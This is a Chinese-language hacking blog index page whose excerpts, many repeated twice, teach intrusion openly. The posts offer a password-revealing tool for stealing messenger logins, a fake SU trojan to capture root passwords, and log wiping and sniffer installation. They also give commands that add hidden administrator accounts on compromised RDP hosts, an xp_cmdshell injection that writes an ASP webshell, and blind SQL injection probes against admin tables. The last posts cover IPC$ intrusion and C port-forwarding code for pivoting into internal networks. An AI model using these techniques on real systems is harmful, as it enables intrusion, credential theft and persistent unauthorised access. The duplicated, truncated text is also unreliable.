i wanna sharing a script called "MessenPass"
Link: "http://www.xun6.com/file/4d700e100/mspass.rar.html"
uncompress: Deep-Sea
Even no need one sec. it can show pwd to u.
Get your flash drive and try it !
usage:just click the file named "mspass.exe".
p.s So,Hacker can be easier to accross network to get pwd,to say nothing of in front of your computer.
Selected Category: Attack/Defence (23)
- Apr 14 Thu 2011 12:22
<Hack-attack>How to find the password of Instant Messager such as MSN?
- Nov 16 Fri 2007 05:25
<Hack>下載利器新發現
本來網路上許多影片大家應該都會有想要下載到自己電腦的衝動
雖然網站總是有提供什麼收藏等等(=.=...本人沒用過)
但放到自己電腦的感覺比較好...
侵權....的確啦......不過...這裡只是分享,這我就不教學了
最近逛國外網站看到一個連結是有關下載軟體的
我就連去看了一下...發現他大體上跟迅雷非常的相似
而我剛好重灌完電腦...所以想說下載這來用好了(有多了個小功能...應該是說..很重要的功能)
因為我不喜歡迅雷一堆廣告有的沒的..當然是可以破解掉..但就是不喜歡
結果裝了這下載軟體後..........
這樣講好了......現在..大家會看到影片的熱門網站
不外乎是..
i'mVlog ..youtube...無名對吧.....
試驗結果........全部可以下載........而且很快(快才是重點)
當然指的不是下載速度快.....(這沒什麼好厲害的....雖然我也順便把線程破解到無限了...是很快沒錯)
重點是不用煩雜的步驟.........
像之前看到喜歡的影片想要下載..都很麻煩...(雖然都可以下載但都要手動步驟)
後來打算要寫軟體來下載...但太忙了...研究所念的很煩(其實是太懶吧=.=)
剛好讓我遇到了這好東西.......只能說讚
簡單的介面沒有煩死人的廣告
p.s......來個ps一下...光是能下載影片我就不用分類到hack區了
我試驗了一下其他地方..........................
................像之前我分享過抓ezpeer.. 或是kkbox的軟體
也都被取代了......
重點還有...........正在試驗........網頁內檔位置....(點到這就好了)
試驗就是......光破一個沒有用......我會把所以熱門網站都試過再說.....
- Feb 20 Tue 2007 20:12
<Hacker教學>thx系列教程(五)
從這裡開始(你的第一個帳號)
--------------------------------------------------------------------------------
主題:
破解(Cracking)passwrd 文檔
與新手交談
困難的方法
利用mount命令獲取訪問權限
有很多方法可以獲得一個起始帳號.我將深入每個方面幫助你開始.你所需的只是一個好的帳號,用來獲得數百個帳號.想一想這:你進入一個很好的可以利用的系統(大多是Linux機器;),奪取root權限並裝上一個Sniffer(嗅探器);這個TCP sniffer 將監測到網絡上任何login(登陸)過程並記錄下所有Telnet,Ftp或撥號進出的Login 名和口令;這樣即使是一個小以太網你也可獲得大約100個口令,如果是一個更大的網絡供應商你就會得到全世界的數百個帳號!這一切,你只要有某個可利用系統的一個好帳號和口令就可做到!如果你看起來無法利用某系統的root權限,那就拿它來破解口令,用來和那些但沒有shell帳號或磁盤空間的其他hacker及IRC使用者交換.決不要把一個你有root權限的系統的口令給出去!你自己留著它!
OK,讓我們開始深入獲取你的第一個帳號的方法.Go!
--------------------------------------------------------------------------------
破解passwd 文檔
如果你是按照心中正確的框架去hacking的話,一般都是先運行破解程序直到得到一個可以進入此系統的好帳號.然後Login上去看看能否奪取系統的root權限.如果可以,拿了root,移取用得著的文檔到你的子目錄裡,抹去你的在場痕跡,清除所有日誌.這樣就準備好可以安裝Sniffer了.
為何要去破解那些只用24小時就可破解出大部分口令的系統?我們的目的不僅僅是正在hack的機器,還有那些與之相連的機器.如果某系統沒有利用價值,不要在它上面浪費時間,去尋找下一個目標.後註:如果你僅僅是為了得到上面所說的交換帳號的口令那又另當別論.
得到一個管理員的帳號後,你可能會想讀一讀他的歷史文檔,看看他是否曾用過SU命令成為root.如果有,你就可以用SU特洛伊木馬幫你奪取root口令.它如此工作:你更改他(管理員)的Shell腳本使得一隱藏目錄(.term)被很好安置在搜尋路徑裡所有目錄之前.把偽SU程序放在該.term(或其他)目錄裡.他鍵下SU,對他來說一切都如常,在提示下他鍵入root口令,然後口令就悄悄地被拷貝到/tmp/.elm69的log文檔裡,同時刪除偽SU文件,並返回一個摽諏畬頂的信息讓他再試一次.管理員一定認為是他輸入錯了,便再次運行SU,但這回是真的SU了.
在後面的uuencode過的附錄裡,你可找到假SU程序.
這是DOC文檔:
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1.更改路徑到你已有訪問權限的用戶帳號上,此前你應已從歷史文檔中看到他曾用過SU命令;先建立放SU特洛伊程序的目錄.最好是.term或.elm.
2.確定已編輯過su.c的頭部指向你所用路徑,使得SU特洛伊可自我刪除並在第二次嘗試讓真SU程序運行.
3.把所有文件放進目標目錄,並編譯su.c.
--------------------------------------------------------------------------------
主題:
破解(Cracking)passwrd 文檔
與新手交談
困難的方法
利用mount命令獲取訪問權限
有很多方法可以獲得一個起始帳號.我將深入每個方面幫助你開始.你所需的只是一個好的帳號,用來獲得數百個帳號.想一想這:你進入一個很好的可以利用的系統(大多是Linux機器;),奪取root權限並裝上一個Sniffer(嗅探器);這個TCP sniffer 將監測到網絡上任何login(登陸)過程並記錄下所有Telnet,Ftp或撥號進出的Login 名和口令;這樣即使是一個小以太網你也可獲得大約100個口令,如果是一個更大的網絡供應商你就會得到全世界的數百個帳號!這一切,你只要有某個可利用系統的一個好帳號和口令就可做到!如果你看起來無法利用某系統的root權限,那就拿它來破解口令,用來和那些但沒有shell帳號或磁盤空間的其他hacker及IRC使用者交換.決不要把一個你有root權限的系統的口令給出去!你自己留著它!
OK,讓我們開始深入獲取你的第一個帳號的方法.Go!
--------------------------------------------------------------------------------
破解passwd 文檔
如果你是按照心中正確的框架去hacking的話,一般都是先運行破解程序直到得到一個可以進入此系統的好帳號.然後Login上去看看能否奪取系統的root權限.如果可以,拿了root,移取用得著的文檔到你的子目錄裡,抹去你的在場痕跡,清除所有日誌.這樣就準備好可以安裝Sniffer了.
為何要去破解那些只用24小時就可破解出大部分口令的系統?我們的目的不僅僅是正在hack的機器,還有那些與之相連的機器.如果某系統沒有利用價值,不要在它上面浪費時間,去尋找下一個目標.後註:如果你僅僅是為了得到上面所說的交換帳號的口令那又另當別論.
得到一個管理員的帳號後,你可能會想讀一讀他的歷史文檔,看看他是否曾用過SU命令成為root.如果有,你就可以用SU特洛伊木馬幫你奪取root口令.它如此工作:你更改他(管理員)的Shell腳本使得一隱藏目錄(.term)被很好安置在搜尋路徑裡所有目錄之前.把偽SU程序放在該.term(或其他)目錄裡.他鍵下SU,對他來說一切都如常,在提示下他鍵入root口令,然後口令就悄悄地被拷貝到/tmp/.elm69的log文檔裡,同時刪除偽SU文件,並返回一個摽諏畬頂的信息讓他再試一次.管理員一定認為是他輸入錯了,便再次運行SU,但這回是真的SU了.
在後面的uuencode過的附錄裡,你可找到假SU程序.
這是DOC文檔:
Fake SU by Nfin8 - i-e
IRC: /msg i-e
Easy as 1,2,3 ...
1.更改路徑到你已有訪問權限的用戶帳號上,此前你應已從歷史文檔中看到他曾用過SU命令;先建立放SU特洛伊程序的目錄.最好是.term或.elm.
2.確定已編輯過su.c的頭部指向你所用路徑,使得SU特洛伊可自我刪除並在第二次嘗試讓真SU程序運行.
3.把所有文件放進目標目錄,並編譯su.c.
- Dec 07 Thu 2006 13:30
<HACK>3389技巧整理
3389肉雞快捷鍵
CTRL+ALT+END 把「任務管理器」抓出來
CTRL+ALT+BREAK這個就是切換全屏顯示。
CTRL+ALT+END 打開「Windows 安全」對話框。
ALT+PAGE UP 從左向右在程序之間切換。
ALT+PAGE DOWN 從右向左在程序之間切換。
ALT+INSERT 按啟動順序來回切換程序。
ALT+HOME 顯示「開始」菜單。
CTRL+ALT+BREAK 在窗口(如果適用)和全屏顯示之間切換客戶端。
ALT+DELETE 顯示窗口的彈出式菜單。
CTRL+ALT+減號 (-) 將客戶端活動窗口的快照放在「終端」服務器的剪貼板上(與在本地計算機上按下 ALT+PrintScrn 鍵時的功能相同)。
CTRL+ALT+加號 (+) 將整個客戶端窗口區域的快照放在「終端」服務器的剪貼板上(與在本地計算機上按下 PrintScrn 鍵時的功能相同)。
注意:
在NEC98 計算機中,這些快捷鍵在以下兩種情況下會有些不同:
CTRL+ALT+BREAK由 F12 鍵代替。
CTRL+ALT+END 由 F15 鍵代替。
3389有關用戶操作的基本命令
query user查詢登陸用戶
logoffID蹬出某用戶
net user 查看所有用戶
net user tty310 1506414 /add 添加一個用戶,用戶名tty310 密碼1506414
net localgroup administrators tty310 /add 把tty310這個用戶加到管理員組
net user tty310 查看用戶tty310的情況
net user tty310 82073 將用戶tty310的密碼更改為82073
net user tty310 /delete刪除tty310
net user tty310 /active:no禁用該用戶
net user tty310 /active:yes 啟用該用戶
開3389
3389.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
CTRL+ALT+END 把「任務管理器」抓出來
CTRL+ALT+BREAK這個就是切換全屏顯示。
CTRL+ALT+END 打開「Windows 安全」對話框。
ALT+PAGE UP 從左向右在程序之間切換。
ALT+PAGE DOWN 從右向左在程序之間切換。
ALT+INSERT 按啟動順序來回切換程序。
ALT+HOME 顯示「開始」菜單。
CTRL+ALT+BREAK 在窗口(如果適用)和全屏顯示之間切換客戶端。
ALT+DELETE 顯示窗口的彈出式菜單。
CTRL+ALT+減號 (-) 將客戶端活動窗口的快照放在「終端」服務器的剪貼板上(與在本地計算機上按下 ALT+PrintScrn 鍵時的功能相同)。
CTRL+ALT+加號 (+) 將整個客戶端窗口區域的快照放在「終端」服務器的剪貼板上(與在本地計算機上按下 PrintScrn 鍵時的功能相同)。
注意:
在NEC98 計算機中,這些快捷鍵在以下兩種情況下會有些不同:
CTRL+ALT+BREAK由 F12 鍵代替。
CTRL+ALT+END 由 F15 鍵代替。
3389有關用戶操作的基本命令
query user查詢登陸用戶
logoffID蹬出某用戶
net user 查看所有用戶
net user tty310 1506414 /add 添加一個用戶,用戶名tty310 密碼1506414
net localgroup administrators tty310 /add 把tty310這個用戶加到管理員組
net user tty310 查看用戶tty310的情況
net user tty310 82073 將用戶tty310的密碼更改為82073
net user tty310 /delete刪除tty310
net user tty310 /active:no禁用該用戶
net user tty310 /active:yes 啟用該用戶
開3389
3389.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
- Dec 07 Thu 2006 01:39
<HACK>最詳細的SQL注入相關的命令整理
1、 用^轉義字符來寫ASP(一句話木馬)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^>c:\mu.asp';--
? echo ^
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^>c:\mu.asp';--
? echo ^
- Dec 07 Thu 2006 01:35
<HACK>快速學習,理解.SQL注入技術
檢測可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常頁面)
http://127.0.0.1/xx?id=11 and 1=2 (出錯頁面)
檢測表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)
檢測字段的
http://127.0.0.1/xx?id=11 and exists (select username from admin)
檢測ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
檢測長度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
檢測長度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
檢測是否為MSSQL數據庫
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
檢測是否為英文
(ACCESS數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
檢測英文的範圍
(ACCESS數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
檢測那個字符
(ACCESS數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL數據庫)
http://127.0.0.1/xx?id=區區一條狗 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
常用函數
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII碼
Access:chr(數字) SQLServer:nchar(數字)
作用:與asc相反,根據ASCII碼返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串從N個字符起長度為L的子字符串,即N到N+L之間的字符串
Access:abc(數字) SQLServer:abc (數字)
作用:返回數字的絕對值(在猜解漢字的時候會用到)
Access:A between B And C SQLServer:A between B And C
作用:判斷A是否界於B與C之間
and exists(Select top 1 * From 用戶 order by id)
1.在查詢結果中顯示列名:
a.用as關鍵字:select name as 』姓名』 from students order by age
b.直接表示:select name 』華夏黑客同盟』 from students order by age
2.精確查找:
a.用in限定範圍:select * from students where native in (』湖南』, 』四川』)
b.between...and:select * from students where age between 20 and 30
http://127.0.0.1/xx?id=11 and 1=1 (正常頁面)
http://127.0.0.1/xx?id=11 and 1=2 (出錯頁面)
檢測表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)
檢測字段的
http://127.0.0.1/xx?id=11 and exists (select username from admin)
檢測ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
檢測長度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
檢測長度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
檢測是否為MSSQL數據庫
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
檢測是否為英文
(ACCESS數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
檢測英文的範圍
(ACCESS數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
檢測那個字符
(ACCESS數據庫)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL數據庫)
http://127.0.0.1/xx?id=區區一條狗 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
常用函數
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII碼
Access:chr(數字) SQLServer:nchar(數字)
作用:與asc相反,根據ASCII碼返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串從N個字符起長度為L的子字符串,即N到N+L之間的字符串
Access:abc(數字) SQLServer:abc (數字)
作用:返回數字的絕對值(在猜解漢字的時候會用到)
Access:A between B And C SQLServer:A between B And C
作用:判斷A是否界於B與C之間
and exists(Select top 1 * From 用戶 order by id)
1.在查詢結果中顯示列名:
a.用as關鍵字:select name as 』姓名』 from students order by age
b.直接表示:select name 』華夏黑客同盟』 from students order by age
2.精確查找:
a.用in限定範圍:select * from students where native in (』湖南』, 』四川』)
b.between...and:select * from students where age between 20 and 30
- Nov 26 Sun 2006 13:58
<Hackbase>詳盡的IPC$入侵
一、 簡介:
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這麼說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的權限,從而達到不可告人的目的.
解惑:
1)IPC連接是Windows NT及以上系統中特有的遠程網絡登陸功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
3)並不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表
二 、建立ipc$連接在hack攻擊中的作用
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定權限的用戶身份登陸的話,那麼你就會得到相應的權限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)
不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
因此今後你最大的可能就是以極小的權限甚至是沒有權限進行連接,你會慢慢的發現ipc$連接並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.
三、 ipc$與空連接,139,445端口,默認共享的關係
以上四者的關係可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃瞄弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何權限(很鬱悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的權限(有權限誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
2)ipc$與139,445端口:
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.
3)ipc$與默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
四、 ipc$連接失敗的原因
以下5個原因是比較常見的:
1)你的系統不是NT或以上操作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445端口(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權限的,先提升權限;
錯誤號51,Windows 無法找到網絡路徑 : 網絡有問題;
錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(端口過濾);
錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集衝突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
關於ipc$連不上的問題比較複雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就靠大家自己體會和試驗了.
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這麼說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的權限,從而達到不可告人的目的.
解惑:
1)IPC連接是Windows NT及以上系統中特有的遠程網絡登陸功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
3)並不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表
二 、建立ipc$連接在hack攻擊中的作用
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定權限的用戶身份登陸的話,那麼你就會得到相應的權限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)
不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
因此今後你最大的可能就是以極小的權限甚至是沒有權限進行連接,你會慢慢的發現ipc$連接並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.
三、 ipc$與空連接,139,445端口,默認共享的關係
以上四者的關係可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃瞄弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何權限(很鬱悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的權限(有權限誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
2)ipc$與139,445端口:
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.
3)ipc$與默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
四、 ipc$連接失敗的原因
以下5個原因是比較常見的:
1)你的系統不是NT或以上操作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445端口(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權限的,先提升權限;
錯誤號51,Windows 無法找到網絡路徑 : 網絡有問題;
錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(端口過濾);
錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集衝突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
關於ipc$連不上的問題比較複雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就靠大家自己體會和試驗了.
- Nov 26 Sun 2006 13:56
<Hackbase>如何突破TCP-IP過濾防火牆進入內網
現在很多企業或者公司基本上網方式基本上都是申請一條連接到Internet的線路,寬帶、DDN、ADSL、ISDN等等,然後用一台服務器做網關,服務器兩塊網卡,一塊是連接到Internet,另一塊是連接到內網的HUB或者交換機,然後內網的其他機器就可以通過網關連接到Internet。
也許有些人會這樣想,我在內網之中,我們之間沒有直接的連接,你沒有辦法攻擊我。事實並非如此,在內網的機器同樣可能遭受到來自Internet的攻擊,當然前提是攻擊者已經取得網關服務器的某些權限,呵呵,這是不是廢話?其實,Internet上很多做網關的服務器並未經過嚴格的安全配置,要獲取權限也不是想像中的那麼難。
Ok!廢話就不說了,切入正題。我們的目標是用我們的TermClient[M$終端服務客戶端]連接到敵人內網的TermServer機器。M$的終端服務是一個很好的遠程管理工具,不是嗎?呵呵。沒有做特別說明的話,文中提到的服務器OS都為windows
2000。服務器為Linux或其他的話,原理也差不多,把程序稍微修改就行了。
<<第一部分:利用TCP socket數據轉發進入沒有防火牆保護的內網>>
假設敵人網絡拓撲如下圖所示,沒有安裝防火牆或在網關服務器上做TCP/IP限制。
我們的目標是連接上敵人內網的Terminal
Server[192.168.1.3],因為沒有辦法直接和他建立連接,那麼只有先從它的網關服務器上下手了。假如敵人網關服務器是M$的windows
2k,IIS有Unicode漏洞[現在要找些有漏洞的機器太容易了,但我只是scripts
kid,只會利用現成的漏洞做些簡單的攻擊:(555),那麼我們就得到一個網關的shell了,我們可以在那上面運行我們的程序,雖然權限很低,但也可以做很多事情了。Ok!讓我們來寫一個做TCP
socket數據轉發的小程序,讓敵人的網關服務器忠實的為我[202.1.1.1]和敵人內網的TermServer[192.168.1.3]之間轉發數據。題外話:實際入侵過程是先取得網關服務器的權限,然後用他做跳板,進一步摸清它的內部網絡拓撲結構,再做進一步的入侵,現在敵人的網絡拓撲是我們給他設計的,哈哈。
攻擊流程如下:
<1>在網關服務器202.2.2.2運行我們的程序AgentGateWay,他監聽TCP
3389端口[改成別的,那我們就要相應的修改TermClient了]等待我們去連接。
<2>我們202.1.1.1用TermClient連接到202.2.2.2:3389。
<3>202.2.2.2.接受202.1.1.1的連接,然後再建立一個TCP
socket連接到自己內網的TermServer[192.168.1.3]
<4>這樣我們和敵人內網的TermServer之間的數據通道就建好了,接下來網關就忠實的為我們轉發數據啦。當我們連接到202.2.2.2:3389的時候,其實出來的界面是敵人內網的192.168.1.3,感覺怎麼樣?:)
程序代碼如下:
/**********************************************************************
Module Name:AgentGateWay.c
Date:2001/4/15
CopyRight(c) eyas
說明:端口重定向工具,在網關上運行,把端口重定向到內網的IP、PORT,
就可以進入內網了
sock[0]==>sClient sock[1]==>sTarget
**********************************************************************/
#include
#include
#include "TCPDataRedird.c"
#define TargetIP TEXT("192.168.1.3")
#define TargetPort (int)3389
#define ListenPort (int)3389//監聽端口
#pragma comment(lib,"ws2_32.lib")
int main()
{
WSADATA wsd;
SOCKET sListen=INVALID_SOCKET,//本機監聽的socket
sock[2];
struct sockaddr_in Local,Client,Target;
int iAddrSize;
HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
hThreadT2C=NULL;//T2C=TargetToClient
DWORD dwThreadID;
__try
{
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
printf("\nWSAStartup() failed:%d",GetLastError());
__leave;
也許有些人會這樣想,我在內網之中,我們之間沒有直接的連接,你沒有辦法攻擊我。事實並非如此,在內網的機器同樣可能遭受到來自Internet的攻擊,當然前提是攻擊者已經取得網關服務器的某些權限,呵呵,這是不是廢話?其實,Internet上很多做網關的服務器並未經過嚴格的安全配置,要獲取權限也不是想像中的那麼難。
Ok!廢話就不說了,切入正題。我們的目標是用我們的TermClient[M$終端服務客戶端]連接到敵人內網的TermServer機器。M$的終端服務是一個很好的遠程管理工具,不是嗎?呵呵。沒有做特別說明的話,文中提到的服務器OS都為windows
2000。服務器為Linux或其他的話,原理也差不多,把程序稍微修改就行了。
